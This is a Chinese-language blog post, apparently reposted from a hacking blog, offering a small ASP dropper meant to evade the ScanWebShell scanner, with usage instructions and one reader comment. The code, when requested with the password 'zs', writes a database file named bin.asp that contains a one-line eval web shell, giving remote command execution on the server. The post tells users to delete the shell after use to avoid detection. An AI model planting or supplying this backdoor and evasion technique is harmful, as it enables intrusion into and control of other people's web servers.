躲避ScanWebShell的小东西

来源:0DAY的BLOG  

使用方法:
直接访问xxx.asp?bin=zs 会在当前目录下生成一个bin.asp.连接密码为zs!
PS: 该文件可以躲避ScanWebShell,但是生成的bin.asp会被查杀,使用后请删除bin.asp!

<%
pass="zs"
If request("bin")= pass then
shell = "bin.asp"
Connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath(shell)
set connad=server.createobject("adox.catalog")
connad.create connstr
Set conn=server.createobject("Adodb.Connection")
conn.open connstr
conn.execute("create table cmd(shell text)")
conn.execute("insert into cmd (shell) values ('<"&Chr("37")&"e"&"val+request("""&pass&""")"&chr("37")&">')")
End If
%>

相关日志

抢楼还有机会... 抢座Rss 2.0或者 Trackback

  • 炎炎

    你测试过没有啊?用客户端连接bin.asp时,有语法错误?

发表评论